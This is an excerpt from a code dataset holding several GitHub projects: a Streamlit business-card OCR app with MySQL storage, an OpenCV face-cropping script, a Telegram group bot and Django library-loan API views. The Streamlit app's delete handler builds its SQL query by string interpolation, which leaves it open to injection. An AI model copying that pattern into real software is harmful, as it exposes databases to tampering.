bizcard_data(company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code,image)\r\n VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\"\r\n mycursor.execute(sql, tuple(row))\r\n mydb.commit()\r\n st.success(\"#### Uploaded to database successfully!\")\r\n \r\n# MODIFY MENU \r\nwith tab3:\r\n col1,col2,col3 = st.columns([3,3,2])\r\n col2.markdown(\"## Alter or Delete the data here\")\r\n column1,column2 = st.columns(2,gap=\"large\")\r\n try:\r\n with column1:\r\n mycursor.execute(\"SELECT card_holder FROM bizcard_data\")\r\n result = mycursor.fetchall()\r\n business_cards = {}\r\n for row in result:\r\n business_cards[row[0]] = row[0]\r\n selected_card = st.selectbox(\"Select a card holder name to update\", list(business_cards.keys()))\r\n st.markdown(\"#### Update or modify any data below\")\r\n mycursor.execute(\"select company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code from bizcard_data WHERE card_holder=%s\",\r\n (selected_card,))\r\n result = mycursor.fetchone()\r\n\r\n # DISPLAYING ALL THE INFORMATIONS\r\n company_name = st.text_input(\"Company_Name\", result[0])\r\n card_holder = st.text_input(\"Card_Holder\", result[1])\r\n designation = st.text_input(\"Designation\", result[2])\r\n mobile_number = st.text_input(\"Mobile_Number\", result[3])\r\n email = st.text_input(\"Email\", result[4])\r\n website = st.text_input(\"Website\", result[5])\r\n area = st.text_input(\"Area\", result[6])\r\n city = st.text_input(\"City\", result[7])\r\n state = st.text_input(\"State\", result[8])\r\n pin_code = st.text_input(\"Pin_Code\", result[9])\r\n\r\n if st.button(\"Commit changes to DB\"):\r\n # Update the information for the selected business card in the database\r\n mycursor.execute(\"\"\"UPDATE bizcard_data SET company_name=%s,card_holder=%s,designation=%s,mobile_number=%s,email=%s,website=%s,area=%s,city=%s,state=%s,pin_code=%s\r\n WHERE card_holder=%s\"\"\", (company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code,selected_card))\r\n mydb.commit()\r\n st.success(\"Information updated in database successfully!\")\r\n\r\n with column2:\r\n mycursor.execute(\"SELECT card_holder FROM bizcard_data\")\r\n result = mycursor.fetchall()\r\n business_cards = {}\r\n for row in result:\r\n business_cards[row[0]] = row[0]\r\n selected_card = st.selectbox(\"Select a card holder name to Delete\", list(business_cards.keys()))\r\n st.write(f\"### You have selected :red[**{selected_card}'s**] card to delete\")\r\n st.write(\"#### Proceed to delete this card?\")\r\n\r\n if st.button(\"Yes Delete Business Card\"):\r\n mycursor.execute(f\"DELETE FROM bizcard_data WHERE card_holder='{selected_card}'\")\r\n mydb.commit()\r\n st.success(\"Business card information deleted from database.\")\r\n except:\r\n st.warning(\"There is no data available in the database\")\r\n \r\n if st.button(\"View updated data\"):\r\n mycursor.execute(\"select company_name,card_holder,designation,mobile_number,email,website,area,city,state,pin_code from bizcard_data\")\r\n updated_df = pd.DataFrame(mycursor.fetchall(),columns=[\"Company_Name\",\"Card_Holder\",\"Designation\",\"Mobile_Number\",\"Email\",\"Website\",\"Area\",\"City\",\"State\",\"Pin_Code\"])\r\n st.write(updated_df)\r\n \r\n", "repo_name": "MithunaKN/Bizcardx-Extracting-business-card-data-with-ocr", "sub_path": "Bizcard.py", "file_name": "Bizcard.py", "file_ext": "py", "file_size_in_byte": 11987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "streamlit.set_page_config", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 16, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.tabs", "line_number": 33, "usage_type": "call"}, {"api_name": "easyocr.Reader", "line_number": 35, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 37, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 37, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 37, "usage_type": "name"}, {"api_name": "streamlit.markdown", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 62, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 86, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 87, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "streamlit.columns", "line_number": 91, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 93, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 94, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 96, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 99, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 100, "usage_type": "call"}, {"api_name": "streamlit.spinner", "line_number": 101, "usage_type": "call"}, {"api_name": "streamlit.set_option", "line_number": 102, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 104, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 107, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 108, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 161, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 163, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 167, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 168, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 169, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 178, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 181, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 189, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 197, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 198, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 200, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 206, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 210, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 212, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 220, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 221, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 227, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 228, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 229, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 230, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 231, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 233, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 235, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 236, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 243, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 251, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 252, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 255, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 258, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 260, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 262, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 264, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 265, "usage_type": "call"}]}
+{"seq_id": "23746225844", "text": "import cv2\nimport numpy as np\nimport sqlite3\nimport os #truy cap duong dan\n\nface_cascade=cv2.CascadeClassifier(\"E:/PycharmProjects/OpenCV/Resources/haarcascade_frontalface_default.xml\")\n\ncap=cv2.VideoCapture(0)\n\nsampleNum=0\n\nwhile(True):\n ret,frame=cap.read()\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n faces=face_cascade.detectMultiScale(gray,1.3,5)\n\n for(x,y,w,h) in faces:\n # cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)\n faces = frame[y:y + h+15, x:x + w+15]\n if not os.path.exists('dataset'):\n os.makedirs('dataset')\n output=cv2.resize(faces,(160,160))\n sampleNum+=1\n cv2.imwrite('dataset/nhat' + str(sampleNum) + '.jpg',output)\n # cv2.imwrite('dataset/User.'+str(2)+'.'+ str(sampleNum) +'.jpg',gray[y:y+h,x:x+w])\n print(sampleNum)\n cv2.imshow('frame',frame)\n cv2.waitKey(1)\n\n if sampleNum>90:\n break\n\ncap.release() #giphong\ncv2.destroyAllWindows()", "repo_name": "huyvn799/face_recognition", "sub_path": "cropface.py", "file_name": "cropface.py", "file_ext": "py", "file_size_in_byte": 957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "30483704838", "text": "from aiogram import types\nfrom aiogram.dispatcher.filters import Regexp\n\nfrom service import ai\nfrom loader import dp\nfrom pydub import AudioSegment\nfrom utils.db.aiomysql import BotDB\nfrom utils.misc.throttling import rate_limit\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['in'], commands_prefix=\"/!@\")\nasync def command_in(message: types.Message):\n if await BotDB.check_chat_user(message.chat.id, message.from_user.id) == 0:\n await BotDB.add_user(message.chat.id, message.from_user.id,\n message.from_user.first_name, message.from_user.username)\n await message.answer(f'{message.from_user.first_name} добавлен в список')\n else:\n await message.answer('Вы уже в списке')\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['out'], commands_prefix=\"/!@\")\nasync def send_welcome(message: types.Message):\n if message.chat.id == -1001299519078:\n await message.reply('Бездарям запрещена команда')\n return\n if await BotDB.check_chat_user(message.chat.id, message.from_user.id):\n await BotDB.remove_user(message.chat.id, message.from_user.id)\n await message.answer(f'{message.from_user.first_name} удалён из списка')\n else:\n await message.answer('Вас нет в списке')\n\n\n@rate_limit(limit=10)\n@dp.message_handler(Regexp(\"(@|/|!)all\"), chat_type=[\"group\", \"supergroup\"])\nasync def all_command(message: types.Message):\n if await BotDB.check_chat(message.chat.id):\n p = ''\n for line in await BotDB.all_user(message.chat.id):\n p += f'{line[1]} '\n if message.reply_to_message:\n await dp.bot.send_message(message.chat.id, p, reply_to_message_id=message.reply_to_message.message_id)\n else:\n await message.reply(p)\n else:\n await message.reply('Сперва используйте /in')\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['text'], commands_prefix=\"/!@\", is_reply=True)\nasync def voice_convert(message: types.Message):\n if message.reply_to_message.voice or message.reply_to_message.video_note:\n if message.reply_to_message.voice:\n link = message.reply_to_message.voice\n else:\n link = message.reply_to_message.video_note\n file = await dp.bot.get_file(link.file_id)\n file_path = file.file_path\n file_id = f\"temp/{message.from_user.id - message.message_id}\"\n if message.reply_to_message.voice:\n await dp.bot.download_file(file_path, f\"{file_id}.ogg\")\n else:\n await dp.bot.download_file(file_path, f\"{file_id}.mp4\")\n AudioSegment.from_file(f\"{file_id}.mp4\", format=\"mp4\").export(\n f\"{file_id}.ogg\", format=\"ogg\")\n answer = await ai.openai_audio(file_id, message.chat.id, message.message_id)\n if answer:\n await message.reply_to_message.reply(answer)\n await message.delete()\n else:\n await message.reply(\"Отправьте команду ответом на голосовое/видео сообщение\")\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['text'], commands_prefix=\"/!@\")\nasync def voice_convert(message: types.Message):\n await message.reply(\"Отправьте команду ответом на голосовое/видео сообщение\")\n", "repo_name": "papayyg/ProPhet", "sub_path": "handlers/groups/group_basic.py", "file_name": "group_basic.py", "file_ext": "py", "file_size_in_byte": 3566, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aiogram.types.Message", "line_number": 13, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.check_chat_user", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.add_user", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 15, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 11, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 12, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 12, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 24, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.check_chat_user", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 28, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.remove_user", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 22, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 23, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 23, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 37, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.check_chat", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.all_user", "line_number": 40, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 40, "usage_type": "name"}, {"api_name": "loader.dp.bot.send_message", "line_number": 43, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 43, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 43, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 35, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 36, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 36, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Regexp", "line_number": 36, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 52, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 52, "usage_type": "name"}, {"api_name": "loader.dp.bot.get_file", "line_number": 58, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 58, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 58, "usage_type": "name"}, {"api_name": "loader.dp.bot.download_file", "line_number": 62, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 62, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 62, "usage_type": "name"}, {"api_name": "loader.dp.bot.download_file", "line_number": 64, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 64, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 64, "usage_type": "name"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 65, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 65, "usage_type": "name"}, {"api_name": "service.ai.openai_audio", "line_number": 67, "usage_type": "call"}, {"api_name": "service.ai", "line_number": 67, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 50, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 51, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 77, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 75, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 76, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "37374575451", "text": "from django.http import JsonResponse\nfrom http import HTTPStatus\nfrom rest_framework.generics import GenericAPIView\nfrom Libraryapp.Serializers.BorrowSerializer import BorrowSerializer, GETBorrowSerializer\nfrom Libraryapp.utils.functions import log_print\nfrom Libraryapp.models import Borrow, Client, Book, Library, Books_at_library\nfrom datetime import datetime\n\n\nclass GetAllView(GenericAPIView):\n \"\"\" Esse endpoint busca todos os emprestimos da biblioteca no banco\"\"\"\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n log_print(\"retornando todos os emprestimos\")\n borrow = Borrow.objects.all()\n\n list_borrows = []\n\n for result in borrow:\n print(result)\n list_borrows.append(GETBorrowSerializer(result).data) \n\n return JsonResponse({\n \"data\": list_borrows\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n \n\nclass GetAllBorrowInDebt(GenericAPIView):\n \"\"\" Esse endpoint busca todos os emprestimos em debito da biblioteca no banco\"\"\"\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n log_print(\"retornando todos os emprestimos\")\n borrow = Borrow.objects.all().filter(return_date=None)\n\n list_borrows = []\n\n for result in borrow:\n print(result)\n list_borrows.append(GETBorrowSerializer(result).data) \n\n return JsonResponse({\n \"data\": list_borrows\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\nclass GetBorrowByIdView(GenericAPIView):\n \"\"\" Esse endpoint busca um emprestimo da biblioteca por id no banco\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n log_print(\"Buscando emprestimo por id\")\n borrow = Borrow.objects.get(id=pk)\n \n data = GETBorrowSerializer(borrow).data\n\n return JsonResponse({\n \"data\": data\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST) \n \n\nclass RegisterView(GenericAPIView):\n \"\"\" Esse endpoint faz o registro de um novo emprestimo na biblioteca no banco\"\"\"\n serializer_class = BorrowSerializer\n def post(self, request, *args, **kwargs):\n try:\n request_data = request.data\n\n book_fk = request_data.get(\"book_fk\")\n client_fk = request_data.get(\"client_fk\")\n\n log_print(\"procurando cliente pelo id\")\n client = Client.objects.get(id=client_fk)\n log_print(f\"procurando emprestimos desse cliente: {client.name}\")\n borrow = (Borrow.objects\n .filter(client_fk=client.id, return_date=None)\n .count()\n )\n\n # aqui poderia ser feito a quantidade de livros que a biblioteca permite deixar emprestado pra uma só pessoa\n if borrow < 1:\n log_print(f\"Elegivel para emprestimo\")\n log_print(\"Buscando livro na biblioteca\")\n book_at_library = Books_at_library.objects.get(book_fk=book_fk)\n \n log_print(\"verificando se ainda ha livros disponiveis\")\n if(book_at_library.number_of_borrowed_books == book_at_library.book_stock):\n log_print(\"Todos os livros estao emprestados\")\n return JsonResponse({\n \"message\": \"Todos os livros estao emprestados\",\n }, status=HTTPStatus.BAD_REQUEST)\n \n inDate = datetime.now()\n date_formated = inDate.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n log_print(\"salvando data do emprestimo\")\n request_data[\"borrow_date\"] = date_formated\n\n log_print(\"Passando request_data para o serializer\")\n borrow_save = BorrowSerializer(data=request_data)\n \n if borrow_save.is_valid():\n log_print(\"Salvando no banco\")\n borrow_save.save()\n book_at_library.number_of_borrowed_books += 1\n book_at_library.save()\n\n return JsonResponse({\n \"message\": \"Emprestimo Cadastrado\",\n }, status=HTTPStatus.CREATED)\n else:\n return JsonResponse({\n \"message\": \"Esse cliente tem pendencia de livro\"\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\n\nclass DeleteView(GenericAPIView):\n \"\"\" Esse endpoint deleta um emprestimo da biblioteca do banco pelo seu id\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = BorrowSerializer\n def delete(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n\n log_print(\"Procurando id no banco\")\n borrow = Borrow.objects.get(id=pk)\n \n\n log_print(\"procurando o livro na biblioteca\")\n bookAtLibrary = Books_at_library.objects.get(book_fk=borrow.book_fk)\n log_print(\"removendo o numero de livros emprestados\")\n if bookAtLibrary.number_of_borrowed_books > 0:\n bookAtLibrary.number_of_borrowed_books -= 1 \n bookAtLibrary.save()\n\n log_print(\"Deletando emprestimo\")\n borrow.delete()\n\n return JsonResponse({\n \"message\": \"Emprestimo Deletado\",\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n log_print(f\"exception args: {e.args}\")\n log_print(f\"Erro ao deletar, erro -> {type(e).__name__}\")\n\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\n\nclass UpdateView(GenericAPIView):\n \"\"\" Esse endpoint atualiza dados de um livro da biblioteca no banco pelo seu id\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = BorrowSerializer\n def put(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n request_data = request.data\n\n book_fk = request_data.get(\"book_fk\")\n client_fk = request_data.get(\"client_fk\")\n library_fk = request_data.get(\"library_fk\")\n borrow_date = request_data.get(\"borrow_date\")\n end_date = request_data.get(\"end_date\")\n return_date = request_data.get(\"return_date\")\n\n\n book = Borrow.objects.get(id=pk)\n\n book.library_fk = Library.objects.get(pk=library_fk) if library_fk != None else book.library_fk\n book.book_fk = Book.objects.get(pk=book_fk) if book_fk != None else book.book_fk\n book.client_fk = Client.objects.get(pk=client_fk) if client_fk != None else book.client_fk\n book.borrow_date = borrow_date if borrow_date != None else book.borrow_date\n book.end_date = end_date if end_date != None else book.end_date\n book.return_date = return_date if return_date != None else book.return_date\n\n\n log_print(f\"Salvando no banco\")\n book.save()\n\n return JsonResponse({\n \"message\": \"Emprestimo Atualizado\",\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\n\nclass BorrowCloseView(GenericAPIView):\n \"\"\"Esse endpoint faz o fechamento de um emprestimo de livro\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n log_print(\"Buscando emprestimo por id\")\n borrow = Borrow.objects.get(id=pk)\n\n if(borrow.return_date is None):\n log_print(\"Adicionando a data de devolucao\")\n inDate = datetime.now()\n date_formated = inDate.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n log_print(\"salvando emprestimo e livro na biblioteca\")\n borrow.return_date = date_formated\n borrow.save()\n\n log_print(\"procurando o livro na biblioteca\")\n bookAtLibrary = Books_at_library.objects.get(book_fk=borrow.book_fk)\n log_print(\"removendo o numerode livros emprestados\")\n if bookAtLibrary.number_of_borrowed_books > 0:\n bookAtLibrary.number_of_borrowed_books -= 1 \n bookAtLibrary.save()\n\n\n return JsonResponse({\n \"response\": \"Emprestimo finalizado\",\n }, status=HTTPStatus.OK)\n \n return JsonResponse({\n \"response\":\"Livro ja devolvido\"\n }, status=HTTPStatus.BAD_REQUEST)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST) ", "repo_name": "pi013univesp/backend-saladeleitura", "sub_path": "Libraryapp/Views/BorrowView.py", "file_name": "BorrowView.py", "file_ext": "py", "file_size_in_byte": 10345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework.generics.GenericAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 12, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 15, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 16, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 26, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 26, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 33, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 33, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 36, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 38, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 41, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 42, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 42, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 48, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 52, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 52, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 59, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 61, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 63, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 63, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 64, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 68, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 69, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 69, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 71, "usage_type": "call"}, {"api_name": 